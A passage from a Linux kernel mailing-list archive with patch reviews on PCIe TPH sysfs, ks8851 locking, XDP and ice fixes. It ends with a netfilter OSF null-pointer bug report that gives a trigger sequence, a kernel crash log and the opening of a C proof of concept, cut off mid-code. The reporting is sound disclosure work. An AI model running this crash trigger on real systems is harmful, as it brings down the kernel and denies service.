> >>>> straightforward, reducing code complexity and long-term maintenance cost.
> >>>>
> >>>> - Design Alignment: TPH Steering Tag is a generic PCIe device feature, not
> >>>> specific to
> >>>> user-space drivers like DPDK or VFIO. Exposing it via sysfs matches the
> >>>> kernel's
> >>>> standard pattern for hardware capabilities.
> >>>>
> >>>>
> >>>> I look forward to your comments about this design before submitting the
> >>>> final patch.
> >>>
> >>> You need to explain more clearly why this write functionality is useful
> >>> and necessary outside the VFIO/RDMA context:
> >>> https://lore.kernel.org/all/20260324234615.3731237-1-zhipingz@meta.com/
> >>>
> >>> AFAIK, for non-VFIO TPH callers, kernel has enough knowledge to set
> >>> right ST values.
> >>>
> >>> There are several comments regarding the implementation, but those can wait
> >>> until the rationale behind the proposal is fully clarified.
> >>
> >> Thanks for your review and comments.
> >>
> >> Let me clarify the rationale behind this user-space sysfs interface:
> >>
> >> 1. VFIO is just one of the user-space device access frameworks.
> >> There are many other in-kernel frameworks that expose devices
> >> to user space, such as UIO, UACCE, etc., which may also require
> >> TPH Steering Tag support.
> >>
> >> 2. The kernel can automatically program Steering Tags only when
> >> the device provides a standard ST table in MSI-X or config space.
> >> However, many devices implement vendor-specific or platform-specific
> >> Steering Tag programming methods that cannot be fully handled
> >> by the generic kernel code.
> >>
> >> 3. For such devices, user-space applications or framework drivers
> >> need to retrieve and configure TPH Steering Tags directly.
> >> A unified sysfs interface allows all user-space frameworks
> >> (not just VFIO) to use a common, standard way to manage
> >> TPH Steering Tags, rather than implementing duplicated logic
> >> in each subsystem.
> >>
> >> This interface provides a uniform method for any user-space
> >> device access solution to work with TPH, which is why I believe
> >> it is useful and necessary beyond the VFIO/RDMA case.
> >
> > I understand the rationale for providing a read interface, for example for
> > debugging, but I do not see any justification for a write interface.
>
> Thank you for the comment!
>
> As I explained, read interface is not only for debugging. It was used to
> such device who don't declare ST location in MSI-X or config-space, the following
> is Intel X710 NIC device's lspci output (only TPH part):
>
> Capabilities: [1a0 v1] Transaction Processing Hints
> Device specific mode supported
> No steering table available
>
> So we could not config the ST for device on kernel because it's vendor specific.
> But we could configure ST by it's vendor user-space driver, in this case, we
> should get ST from kernel to user-space.
Vendor-specific, in the context of the PCI specification, does not mean the
kernel cannot configure it. It simply means that the ST values are not
stored in the ST table.
Thanks
^ permalink raw reply
* Re: [net,PATCH v2] net: ks8851: Reinstate disabling of BHs around IRQ handler
From: Sebastian Andrzej Siewior @ 2026-04-14 8:55 UTC (permalink / raw)
To: Marek Vasut
Cc: Jakub Kicinski, netdev, stable, David S. Miller, Andrew Lunn,
Eric Dumazet, Nicolai Buchwitz, Paolo Abeni, Ronald Wahl,
Yicong Hui, linux-kernel, Thomas Gleixner
In-Reply-To: <20260413160336.GQCaw-1d@linutronix.de>
On 2026-04-13 18:03:38 [+0200], To Marek Vasut wrote:
> On 2026-04-13 17:31:34 [+0200], Marek Vasut wrote:
> > > I don't see why it needs to disable interrupts.
> >
> > Because when the lock is held, the PAR code shouldn't be interrupted by an
> > interrupt, otherwise it would completely mess up the state of the KS8851
> > MAC. The spinlock does not protect only the IRQ handler, it protects also
> > ks8851_start_xmit_par() and ks8851_write_mac_addr() and
> > ks8851_read_mac_addr() and ks8851_net_open() and ks8851_net_stop() and other
> > sites which call ks8851_lock()/ks8851_unlock() which cannot be executed
> > concurrently, but where BHs can be enabled.
>
> I need check this once brain is at full power again. But which
> interrupt? Your interrupt is threaded. So that should be okay.
I don't understand. There is no point in using spin_lock_irqsave() in
ks8851_lock_par(). You don't protect against interrupts because none of
the user actually run in an interrupt. As far as I can see, the
interrupt is threaded and the mdio phy link checks should come from the
workqueue.
What is wrong is that the ndo_start_xmit callback can be invoked from a
softirq and such you must disable BHs while acquiring a lock which can
be accessed from both contexts. Therefore spin_lock() is not sufficient,
it needs the _bh() and _irq() brings no additional value here.
Sebastian
^ permalink raw reply
* Re: [PATCH] netfilter: nfnetlink_osf: fix null-ptr-deref in nf_osf_ttl
From: Pablo Neira Ayuso @ 2026-04-14 8:55 UTC (permalink / raw)
To: Kito Xu (veritas501)
Cc: coreteam, davem, edumazet, ffmancera, fw, horms, kuba,
linux-kernel, netdev, netfilter-devel, pabeni, phil
In-Reply-To: <20260414083703.2531953-1-hxzene@gmail.com>
On Tue, Apr 14, 2026 at 04:37:02PM +0800, Kito Xu (veritas501) wrote:
> From: Kito Xu <hxzene@gmail.com>
>
> Hi Pablo,
>
> On Tue, Apr 14, 2026 at 10:22:06AM +0200, Pablo Neira Ayuso wrote:
> > How could skb->dev be NULL !?
>
> skb->dev is NOT NULL. The NULL value is `in_dev` returned by
> __in_dev_get_rcu(skb->dev), because dev->ip_ptr is NULL after
> inetdev_destroy().
More detailed report helps.
> > This is run from prerouting, input and forward.
>
> Correct. The crash path is in PREROUTING on lo.
>
> > I cannot believe this, I think AI is mocking KASAN splat, if that is
> > the case, I am sorry to say, but it is too bad if you are doing this.
>
> This is a real bug with a reproducible PoC. I understand the KASAN
> output in my original patch email looked suspicious because it was
> interleaved with the PoC's stderr output (the PoC prints debug lines
> while the kernel oops scrolls by simultaneously). That was a formatting
> mistake on my part.
No need for PoC, just a bit more details is enough.
Thanks for explaining.
^ permalink raw reply
* Re: [PATCH net v7 1/2] net, bpf: fix null-ptr-deref in xdp_master_redirect() for down master
From: Paolo Abeni @ 2026-04-14 8:53 UTC (permalink / raw)
To: Jiayuan Chen, netdev, Daniel Borkmann
Cc: syzbot+80e046b8da2820b6ba73, Martin KaFai Lau, John Fastabend,
Stanislav Fomichev, Alexei Starovoitov, Andrii Nakryiko,
Eduard Zingerman, Song Liu, Yonghong Song, KP Singh, Hao Luo,
Jiri Olsa, David S. Miller, Eric Dumazet, Jakub Kicinski,
Simon Horman, Jesper Dangaard Brouer, Shuah Khan, Jussi Maki, bpf,
linux-kernel, linux-kselftest
In-Reply-To: <20260411005524.201200-2-jiayuan.chen@linux.dev>
On 4/11/26 2:55 AM, Jiayuan Chen wrote:
> syzkaller reported a kernel panic in bond_rr_gen_slave_id() reached via
> xdp_master_redirect(). Full decoded trace:
>
> https://syzkaller.appspot.com/bug?extid=80e046b8da2820b6ba73
>
> bond_rr_gen_slave_id() dereferences bond->rr_tx_counter, a per-CPU
> counter that bonding only allocates in bond_open() when the mode is
> round-robin. If the bond device was never brought up, rr_tx_counter
> stays NULL.
>
> The XDP redirect path can still reach that code on a bond that was
> never opened: bpf_master_redirect_enabled_key is a global static key,
> so as soon as any bond device has native XDP attached, the
> XDP_TX -> xdp_master_redirect() interception is enabled for every
> slave system-wide. The path xdp_master_redirect() ->
> bond_xdp_get_xmit_slave() -> bond_xdp_xmit_roundrobin_slave_get() ->
> bond_rr_gen_slave_id() then runs against a bond that has no
> rr_tx_counter and crashes.
>
> Fix this in the generic xdp_master_redirect() by refusing to call into
> the master's ->ndo_xdp_get_xmit_slave() when the master device is not
> up. IFF_UP is only set after ->ndo_open() has successfully returned,
> so this reliably excludes masters whose XDP state has not been fully
> initialized. Drop the frame with XDP_ABORTED so the exception is
> visible via trace_xdp_exception() rather than silently falling through.
> This is not specific to bonding: any current or future master that
> defers XDP state allocation to ->ndo_open() is protected.
>
> Fixes: 879af96ffd72 ("net, core: Add support for XDP redirection to slave device")
> Reported-by: syzbot+80e046b8da2820b6ba73@syzkaller.appspotmail.com
> Closes: https://lore.kernel.org/all/698f84c6.a70a0220.2c38d7.00cc.GAE@google.com/T/
> Suggested-by: Daniel Borkmann <daniel@iogearbox.net>
> Acked-by: Daniel Borkmann <daniel@iogearbox.net>
> Signed-off-by: Jiayuan Chen <jiayuan.chen@linux.dev>
> ---
> net/core/filter.c | 2 ++
> 1 file changed, 2 insertions(+)
>
> diff --git a/net/core/filter.c b/net/core/filter.c
> index cf2113af4bc9..9ec70c4b7723 100644
> --- a/net/core/filter.c
> +++ b/net/core/filter.c
> @@ -4398,6 +4398,8 @@ u32 xdp_master_redirect(struct xdp_buff *xdp)
> struct net_device *master, *slave;
>
> master = netdev_master_upper_dev_get_rcu(xdp->rxq->dev);
> + if (unlikely(!(master->flags & IFF_UP)))
> + return XDP_ABORTED;
> slave = master->netdev_ops->ndo_xdp_get_xmit_slave(master, xdp);
The AI review noted that the master could be (theoretically) NULL here.
Since that event is not a regression (unconditional `master` dereference
already present) and syzkaller failed to trigger it (despite being the
sort of thing syzkaller is very good to find) make me thing it's better
to eventually follow-up instead requesting another revision here, but
please have a look.
Thanks,
Paolo
> if (slave && slave != xdp->rxq->dev) {
> /* The target device is different from the receiving device, so
^ permalink raw reply
* Re: [PATCH iwl-next 1/10] ice: translate FW to SW for max num TCs encoding
From: Simon Horman @ 2026-04-14 8:44 UTC (permalink / raw)
To: Aleksandr Loktionov
Cc: intel-wired-lan, anthony.l.nguyen, netdev, Dave Ertman
In-Reply-To: <20260410074921.1254213-2-aleksandr.loktionov@intel.com>
On Fri, Apr 10, 2026 at 09:49:12AM +0200, Aleksandr Loktionov wrote:
> From: Dave Ertman <david.m.ertman@intel.com>
>
> The FW uses a 3-bit field in a TLV to represent the maximum number of
> Traffic Classes supported per interface. Since the maximum value is 8,
> and at least one TC must be supported, the encoding uses bit values of
> 000 to represent 8 TCs.
>
> The driver currently does not translate this value and reports 0 max TCs
> to the DCBNL interface instead of 8.
>
> Add a translation when interfacing with the FW to use 0x0 as the value
> for 8 max TCs.
>
> Signed-off-by: Dave Ertman <david.m.ertman@intel.com>
> Signed-off-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
I'm not sure if you want to reconsider this as a bug fix.
But the code changes look good to me.
Reviewed-by: Simon Horman <horms@kernel.org>
^ permalink raw reply
* RE: [PATCH iwl-net] ice: fix infinite recursion in ice_cfg_tx_topo via ice_init_dev_hw
From: Loktionov, Aleksandr @ 2026-04-14 8:43 UTC (permalink / raw)
To: Oros, Petr, netdev@vger.kernel.org
Cc: Oros, Petr, Nguyen, Anthony L, Kitszel, Przemyslaw, Andrew Lunn,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
Nikolay Aleksandrov, Daniel Zahka, Greenwalt, Paul,
Ertman, David M, Michal Swiatkowski, Keller, Jacob E,
intel-wired-lan@lists.osuosl.org, linux-kernel@vger.kernel.org
In-Reply-To: <20260413191420.3524013-1-poros@redhat.com>
> -----Original Message-----
> From: Petr Oros <poros@redhat.com>
> Sent: Monday, April 13, 2026 9:14 PM
> To: netdev@vger.kernel.org
> Cc: Oros, Petr <poros@redhat.com>; Nguyen, Anthony L
> <anthony.l.nguyen@intel.com>; Kitszel, Przemyslaw
> <przemyslaw.kitszel@intel.com>; Andrew Lunn <andrew+netdev@lunn.ch>;
> David S. Miller <davem@davemloft.net>; Eric Dumazet
> <edumazet@google.com>; Jakub Kicinski <kuba@kernel.org>; Paolo Abeni
> <pabeni@redhat.com>; Loktionov, Aleksandr
> <aleksandr.loktionov@intel.com>; Nikolay Aleksandrov
> <razor@blackwall.org>; Daniel Zahka <daniel.zahka@gmail.com>;
> Greenwalt, Paul <paul.greenwalt@intel.com>; Ertman, David M
> <david.m.ertman@intel.com>; Michal Swiatkowski
> <michal.swiatkowski@linux.intel.com>; Keller, Jacob E
> <jacob.e.keller@intel.com>; intel-wired-lan@lists.osuosl.org; linux-
> kernel@vger.kernel.org
> Subject: [PATCH iwl-net] ice: fix infinite recursion in
> ice_cfg_tx_topo via ice_init_dev_hw
>
> On certain E810 configurations where firmware supports Tx scheduler
> topology switching (tx_sched_topo_comp_mode_en), ice_cfg_tx_topo() may
> need to apply a new 5-layer or 9-layer topology from the DDP package.
> If the AQ command to set the topology fails (e.g. due to invalid DDP
> data or firmware limitations), the global configuration lock must
> still be cleared via a CORER reset.
>
> Commit 86aae43f21cf ("ice: don't leave device non-functional if Tx
> scheduler config fails") correctly fixed this by refactoring
> ice_cfg_tx_topo() to always trigger CORER after acquiring the global
> lock and re-initialize hardware via ice_init_hw() afterwards.
>
> However, commit 8a37f9e2ff40 ("ice: move ice_deinit_dev() to the end
> of deinit paths") later moved ice_init_dev_hw() into ice_init_hw(),
> breaking the reinit path introduced by 86aae43f21cf. This creates an
> infinite recursive call chain:
>
> ice_init_hw()
> ice_init_dev_hw()
> ice_cfg_tx_topo() # topology change needed
> ice_deinit_hw()
> ice_init_hw() # reinit after CORER
> ice_init_dev_hw() # recurse
> ice_cfg_tx_topo()
> ... # stack overflow
>
> Fix by moving ice_init_dev_hw() back out of ice_init_hw() and calling
> it explicitly from ice_probe() and ice_devlink_reinit_up(). The third
> caller, ice_cfg_tx_topo(), intentionally does not need
> ice_init_dev_hw() during its reinit, it only needs the core HW
> reinitialization. This breaks the recursion cleanly without adding
> flags or guards.
>
> The deinit ordering changes from commit 8a37f9e2ff40 ("ice: move
> ice_deinit_dev() to the end of deinit paths") which fixed slow rmmod
> are preserved, only the init-side placement of ice_init_dev_hw() is
> reverted.
>
> Fixes: 8a37f9e2ff40 ("ice: move ice_deinit_dev() to the end of deinit
> paths")
> Signed-off-by: Petr Oros <poros@redhat.com>
> ---
> drivers/net/ethernet/intel/ice/devlink/devlink.c | 2 ++
> drivers/net/ethernet/intel/ice/ice_common.c | 2 --
> drivers/net/ethernet/intel/ice/ice_main.c | 2 ++
> 3 files changed, 4 insertions(+), 2 deletions(-)
>
> diff --git a/drivers/net/ethernet/intel/ice/devlink/devlink.c
> b/drivers/net/ethernet/intel/ice/devlink/devlink.c
> index 6144cee8034d77..641d6e289d5ce6 100644
> --- a/drivers/net/ethernet/intel/ice/devlink/devlink.c
> +++ b/drivers/net/ethernet/intel/ice/devlink/devlink.c
> @@ -1245,6 +1245,8 @@ static int ice_devlink_reinit_up(struct ice_pf
> *pf)
> return err;
> }
>
> + ice_init_dev_hw(pf);
> +
> /* load MSI-X values */
> ice_set_min_max_msix(pf);
>
> diff --git a/drivers/net/ethernet/intel/ice/ice_common.c
> b/drivers/net/ethernet/intel/ice/ice_common.c
> index ce11fea122d03e..b617a6bff89134 100644
> --- a/drivers/net/ethernet/intel/ice/ice_common.c
> +++ b/drivers/net/ethernet/intel/ice/ice_common.c
> @@ -1126,8 +1126,6 @@ int ice_init_hw(struct ice_hw *hw)
> if (status)
> goto err_unroll_fltr_mgmt_struct;
>
> - ice_init_dev_hw(hw->back);
> -
> mutex_init(&hw->tnl_lock);
> ice_init_chk_recipe_reuse_support(hw);
>
> diff --git a/drivers/net/ethernet/intel/ice/ice_main.c
> b/drivers/net/ethernet/intel/ice/ice_main.c
> index e2a5534819d194..a27be29f9bbbfc 100644
> --- a/drivers/net/ethernet/intel/ice/ice_main.c
> +++ b/drivers/net/ethernet/intel/ice/ice_main.c
> @@ -5314,6 +5314,8 @@ ice_probe(struct pci_dev *pdev, const struct
> pci_device_id __always_unused *ent)
> return err;
> }
>
> + ice_init_dev_hw(pf);
> +
> adapter = ice_adapter_get(pdev);
> if (IS_ERR(adapter)) {
> err = PTR_ERR(adapter);
> --
> 2.52.0
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
^ permalink raw reply
* Re: [PATCH] netfilter: nfnetlink_osf: fix null-ptr-deref in nf_osf_ttl
From: Kito Xu (veritas501) @ 2026-04-14 8:37 UTC (permalink / raw)
To: pablo
Cc: coreteam, davem, edumazet, ffmancera, fw, horms, hxzene, kuba,
linux-kernel, netdev, netfilter-devel, pabeni, phil
In-Reply-To: <ad35LhIOSaEDJAhS@chamomile>
From: Kito Xu <hxzene@gmail.com>
Hi Pablo,
On Tue, Apr 14, 2026 at 10:22:06AM +0200, Pablo Neira Ayuso wrote:
> How could skb->dev be NULL !?
skb->dev is NOT NULL. The NULL value is `in_dev` returned by
__in_dev_get_rcu(skb->dev), because dev->ip_ptr is NULL after
inetdev_destroy().
> This is run from prerouting, input and forward.
Correct. The crash path is in PREROUTING on lo.
> I cannot believe this, I think AI is mocking KASAN splat, if that is
> the case, I am sorry to say, but it is too bad if you are doing this.
This is a real bug with a reproducible PoC. I understand the KASAN
output in my original patch email looked suspicious because it was
interleaved with the PoC's stderr output (the PoC prints debug lines
while the kernel oops scrolls by simultaneously). That was a formatting
mistake on my part.
Let me clarify the root cause and provide a clean KASAN report.
## Root Cause
nf_osf_ttl() calls __in_dev_get_rcu(skb->dev) and passes the result
to in_dev_for_each_ifa_rcu() without a NULL check:
static inline int nf_osf_ttl(const struct sk_buff *skb,
int ttl_check, unsigned char f_ttl)
{
struct in_device *in_dev = __in_dev_get_rcu(skb->dev);
...
/* ttl_check == NF_OSF_TTL_LESS, ip->ttl > f_ttl → falls through */
in_dev_for_each_ifa_rcu(ifa, in_dev) { /* NULL deref when in_dev == NULL */
...
in_dev_for_each_ifa_rcu expands to:
for (ifa = rcu_dereference((in_dev)->ifa_list); ...)
When in_dev is NULL, (NULL)->ifa_list is a NULL dereference at offset
0x10, which matches the KASAN report: null-ptr-deref in range
[0x0000000000000010-0x0000000000000017].
## How ip_ptr becomes NULL
The loopback driver (loopback.c) does NOT call ether_setup(), so
dev->min_mtu remains 0. This allows setting MTU below IPV4_MIN_MTU
(68). Setting lo MTU to 67 triggers:
NETDEV_CHANGEMTU event
→ inetdev_valid_mtu(67) == false
→ inetdev_destroy(in_dev)
→ RCU_INIT_POINTER(dev->ip_ptr, NULL)
After this, lo can still receive packets (loopback_xmit → __netif_rx),
but __in_dev_get_rcu(lo) returns NULL.
## Trigger sequence
1. Load OSF fingerprint (genre=Linux, ttl=64, ttl_check=TTL_LESS)
2. Set up iptables raw PREROUTING rule with xt_osf match
3. Set lo MTU to 67 → inetdev_destroy → ip_ptr = NULL
4. Inject SYN (TTL=255 > f_ttl 64) via AF_PACKET on lo
5. ip_rcv → PREROUTING → xt_osf → nf_osf_ttl() → NULL deref
## Clean KASAN report (from separate capture, no interleaving)
```
[ 2.873592] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000002: 0000 [#1] SMP KASAN NOPTI
[ 2.878162] KASAN: null-ptr-deref in range [0x0000000000000010-0x0000000000000017]
[ 2.881836] CPU: 0 UID: 0 PID: 169 Comm: poc Not tainted 7.0.0-rc7-next-20260410+ #11 PREEMPTLAZY
[ 2.885160] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 2.889197] RIP: 0010:nf_osf_match_one+0x204/0xa70
[ 2.891768] Code: 7f 08 84 c0 0f 85 46 06 00 00 41 3a 4c 24 08 0f 83 17 01 00 00 48 b8 00 00 00 00 00 fc ff df 49 8d 7f 10 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 f8 07 00 00 49 8b 5f 10 48 85 db 0f 84 8f fe ff
[ 2.898548] RSP: 0018:ffffc90000007740 EFLAGS: 00010212
[ 2.900439] RAX: dffffc0000000000 RBX: ffffc90000007878 RCX: 0000000000000040
[ 2.903090] RDX: 0000000000000002 RSI: ffff88800b4f30c0 RDI: 0000000000000010
[ 2.906785] RBP: ffff88800fca4820 R08: 0000000000000000 R09: 0000000000000000
[ 2.909418] R10: 0000000000000001 R11: ffff88800b4b7680 R12: ffff88800b4f30d0
[ 2.912058] R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000000
[ 2.914978] FS: 0000000013b96380(0000) GS:ffff8880e2489000(0000) knlGS:0000000000000000
[ 2.917975] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.920236] CR2: 00000000004a0000 CR3: 000000000fa3f000 CR4: 00000000003006f0
[ 2.922952] Call Trace:
[ 2.923947] <IRQ>
[ 2.924779] nf_osf_match+0x2f8/0x780
[ 2.926183] ? __pfx_nf_osf_match+0x10/0x10
[ 2.928630] ? kvm_sched_clock_read+0x11/0x20
[ 2.930946] ? local_clock+0x15/0x30
[ 2.933963] ? kasan_save_track+0x26/0x60
[ 2.936266] ? __pfx__raw_spin_lock+0x10/0x10
[ 2.938605] xt_osf_match_packet+0x11c/0x1f0
[ 2.940360] len=40ipt_do_table+0x7fe/0x12b0
[ 2.942846] ? __pfx_ipt_do_table+0x10/0x10
[ 2.944267] ? __pfx___smp_call_single_queue+0x10/0x10
[ 2.946109] ? __pfx___netif_receive_skb_core.constprop.0+0x10/0x10
[ 2.949929] nf_hook_slow+0xac/0x1e0
[ 2.951288] ip_rcv+0x123/0x370
[ 2.952544] ? __pfx_ip_rcv+0x10/0x10
[ 2.954789] ? tryinc_node_nr_active+0xe6/0x160
[ 2.956407] ?netif_r __pfx_ip_rcv_finish+0x10/0x10
[ 2.958990] ? __smp_call_single_queue+0x2c7/0x480
[ 2.960907] ? __pfx_ip_rcv+0x10/0x10
[ 2.962315] __netif_receive_skb_one_core+0x166/0x1b0
[ 2.964374] ? __pfx___netif_receive_skb_one_core+0x10/0x10
[ 2.966465] ? _raw_spin_lock_irq+0x8a/0xe0
[ 2.968828] ? update_cfs_rq_load_avg+0x5a/0x560
[ 2.970585] process_backlog+0x197/0x590
[ 2.973489] __napi_poll+0xa1/0x540
[ 2.974887] net_rx_action+0x401/0xd80
[ 2.976358] ? __pfx_net_rx_action+0x10/0x10
[ 2.977973] ? timerqueue_linked_add+0x1f4/0x3d0
[ 2.980634] handle_softirqs+0x19f/0x610
[ 2.982012] pfx_handle_softirqs+0x10/0x10
[ 2.984853] do_softirq.part.0+0x3b/0x60
[ 2.986360] </IRQ>
[ 2.987161] <TASK>
[ 2.987845] __local_bh_enable_ip+0x64/0x70
[ 2.989320] __dev_queue_xmit+0x9f7/0x3100
[ 2.990853] ? kvm_clock_get_cycles+0x18/0x30
[ 2.992377] ? ktime_get+0xeb/0x160
[ 2.994640] ? __pfx_skb_set_owner_w+0x10/0x10
[ 2.996116] ? __pfx___dev_queue_xmit+0x10/0x10
[ 2.997850] ? __pfx__copy_from_iter+0x10/0x10
[ 2.999529] ? packet_parse_headers+0x342/0x6b0
[ 3.002132] ? __pfx_packet_parse_headers+0x10/0x10
[ 3.003983] ? _raw_spin_lock_irqsave+0x95/0xf0
[ 3.005551] packet_sendmsg+0x21c2/0x5580
[ 3.007039] ? tty_compat_ioctl+0x238/0x500
[ 3.008445] ? __pfx_ldsem_down_read+0x10/0x10
[ 3.010973] ? _raw_spin_lock_irqsave+0x95/0xf0
[ 3.012634] ? __pfx__raw_spin_lock_irqsave+0x10/0x10
[ 3.014620] ? __pfx_packet_sendmsg+0x10/0x10
[ 3.016292] ? __pfx_aa_sk_perm+0x10/0x10
[ 3.017657] ? __check_object_size+0x4b/0x650
[ 3.019888] __sys_sendto+0x34e/0x3a0
[ 3.021353] ? __pfx___sys_sendto+0x10/0x10
[ 3.022854] ? alloc_fd+0x33b/0x5b0
[ 3.024081] ? ksys_write+0xfc/0x1d0
[ 3.025333] ? __pfx_ksys_write+0x10/0x10
[ 3.027069] __x64_sys_sendto+0xe0/0x1c0
[ 3.028593] do_syscall_64+0x64/0x680
[ 3.030069] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[ 3.032055] RIP: 0033:0x4243f7
[ 3.033269] Code: ff ff f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b5 0f 1f 00 f3 0f 1e fa 80 3d 6d bc 08 00 00 41 89 ca 74 10 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 69 c3 55 48 89 e5 53 48 83 ec 38 44 89 4d d0
[ 3.039978] RSP: 002b:00007ffc7ab0e508 EFLAGS: 00000202 ORIG_RAX: 000000000000002c
[ 3.042801] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00000000004243f7
[ 3.045585] RDX: 0000000000000036 RSI: 00007ffc7ab0e590 RDI: 0000000000000003
[ 3.048006] RBP: 00007ffc7ab0e5d0 R08: 00007ffc7ab0e540 R09: 0000000000000014
[ 3.050552] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffc7ab0e6f8
[ 3.053184] R13: 00007ffc7ab0e708 R14: 00000000004aaf68 R15: 0000000000000001
[ 3.055872] </TASK>
[ 3.056758] Modules linked in:
[ 3.057796] ---[ end trace 0000000000000000 ]---
[ 3.059605] RIP: 0010:nf_osf_match_one+0x204/0xa70
[ 3.061034] Code: 7f 08 84 c0 0f 85 46 06 00 00 41 3a 4c 24 08 0f 83 17 01 00 00 48 b8 00 00 00 00 00 fc ff df 49 8d 7f 10 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 f8 07 00 00 49 8b 5f 10 48 85 db 0f 84 8f fe ff
[ 3.067353] RSP: 0018:ffffc90000007740 EFLAGS: 00010212
[ 3.069348] RAX: dffffc0000000000 RBX: ffffc90000007878 RCX: 0000000000000040
[ 3.072135] RDX: 0000000000000002 RSI: ffff88800b4f30c0 RDI: 0000000000000010
[ 3.074613] RBP: ffff88800fca4820 R08: 0000000000000000 R09: 0000000000000000
[ 3.076982] R10: 0000000000000001 R11: ffff88800b4b7680 R12: ffff88800b4f30d0
[ 3.079532] R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000000
[ 3.082213] FS: 0000000013b96380(0000) GS:ffff8880e2489000(0000) knlGS:0000000000000000
[ 3.085348] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3.087128] CR2: 00000000004a0000 CR3: 000000000fa3f000 CR4: 00000000003006f0
[ 3.089429] Kernel panic - not syncing: Fatal exception in interrupt
[ 3.092322] Kernel Offset: disabled
[ 3.093649] Rebooting in 1 seconds..
```
## PoC (standalone C, requires root, compiles with musl or glibc)
```c
/*
* PoC: nf_osf_ttl() NULL pointer dereference (nfnetlink_osf.c)
*
* Trigger: lo MTU set to 67 (< IPV4_MIN_MTU=68) via ioctl
* → NETDEV_CHANGEMTU → !inetdev_valid_mtu(67)
* → inetdev_destroy(lo) → RCU_INIT_POINTER(lo->ip_ptr, NULL)
*
* SYN injected via AF_PACKET on lo → loopback_xmit
* → eth_type_trans → __netif_rx → ip_rcv → PREROUTING
* → xt_osf → nf_osf_match → nf_osf_match_one
* → nf_osf_ttl(skb, TTL_LESS=1, f_ttl=64)
* L34: in_dev = __in_dev_get_rcu(lo) → NULL
* L46: in_dev_for_each_ifa_rcu(ifa, NULL) → CRASH
*
* Requirements (all built-in in target kernel):
* CONFIG_IP_NF_RAW=y, CONFIG_NETFILTER_XT_MATCH_OSF=y,
* CONFIG_NETFILTER_NETLINK_OSF=y, CONFIG_PANIC_ON_OOPS=y
*
* Run as root.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <linux/if.h>
#include <linux/netlink.h>
/* ------------------------------------------------------------------ */
/* Inline definitions — avoid dependency on kernel UAPI headers */
/* ------------------------------------------------------------------ */
/* netlink / netfilter */
#define NETLINK_NETFILTER 12
#define NFNETLINK_V0 0
#define NFNL_SUBSYS_OSF 5
#define NLM_F_REQUEST 0x0001
#define NLM_F_ACK 0x0004
#define NLM_F_CREATE 0x0400
#define NLMSG_ALIGNTO 4
#define NLMSG_ALIGN(len) (((len)+NLMSG_ALIGNTO-1) & ~(NLMSG_ALIGNTO-1))
#define NLMSG_HDRLEN ((int)NLMSG_ALIGN(sizeof(struct nlmsghdr)))
#define NLMSG_LENGTH(len) ((len) + NLMSG_HDRLEN)
#define NLA_ALIGNTO 4
#define NLA_ALIGN(len) (((len)+NLA_ALIGNTO-1) & ~(NLA_ALIGNTO-1))
#define NLA_HDRLEN ((int)NLA_ALIGN(sizeof(struct nlattr)))
#define NLMSG_ERROR 0x2
struct nfgenmsg {
__u8 nfgen_family;
__u8 version;
__be16 res_id;
};
/* OSF netlink */
#define OSF_MSG_ADD 0
#define OSF_ATTR_FINGER 1
#define MAXGENRELEN 32
#define MAX_IPOPTLEN 40
#define OSF_WSS_PLAIN 0
struct nf_osf_wc {
__u32 wc;
__u32 val;
};
struct nf_osf_opt {
__u16 kind;
__u16 length;
struct nf_osf_wc wc;
};
struct nf_osf_user_finger {
struct nf_osf_wc wss;
__u8 ttl;
__u8 df;
__u16 ss;
__u16 mss;
__u16 opt_num;
char genre[MAXGENRELEN];
char version[MAXGENRELEN];
char subtype[MAXGENRELEN];
struct nf_osf_opt opt[MAX_IPOPTLEN];
};
/* iptables / x_tables */
#define XT_TABLE_MAXNAMELEN 32
#define XT_EXTENSION_MAXNAMELEN 29
#define XT_FUNCTION_MAXNAMELEN 30
#define NF_INET_PRE_ROUTING 0
#define NF_INET_LOCAL_OUT 3
#define NF_INET_NUMHOOKS 5
#define NF_ACCEPT 1
#define IPPROTO_TCP 6
#define IPT_SO_SET_REPLACE 64
#define IPT_SO_GET_INFO 64
#define SOL_IP 0
/* XT_ALIGN: align to 8 bytes (alignof struct with u64 member) */
#define XT_ALIGN(s) (((s) + 7) & ~7)
struct xt_counters {
__u64 pcnt, bcnt;
};
struct ipt_ip {
struct in_addr src, dst;
struct in_addr smsk, dmsk;
char iniface[16], outiface[16];
unsigned char iniface_mask[16], outiface_mask[16];
__u16 proto;
__u8 flags;
__u8 invflags;
};
struct ipt_entry {
struct ipt_ip ip;
unsigned int nfcache;
__u16 target_offset;
__u16 next_offset;
unsigned int comefrom;
struct xt_counters counters;
unsigned char elems[0];
};
struct xt_entry_match {
union {
struct {
__u16 match_size;
char name[XT_EXTENSION_MAXNAMELEN];
__u8 revision;
} user;
__u16 match_size;
} u;
unsigned char data[0];
};
struct xt_entry_target {
union {
struct {
__u16 target_size;
char name[XT_EXTENSION_MAXNAMELEN];
__u8 revision;
} user;
__u16 target_size;
} u;
unsigned char data[0];
};
struct xt_standard_target {
struct xt_entry_target target;
int verdict;
};
struct xt_error_target {
struct xt_entry_target target;
char errorname[XT_FUNCTION_MAXNAMELEN];
};
struct ipt_getinfo {
char name[XT_TABLE_MAXNAMELEN];
unsigned int valid_hooks;
unsigned int hook_entry[NF_INET_NUMHOOKS];
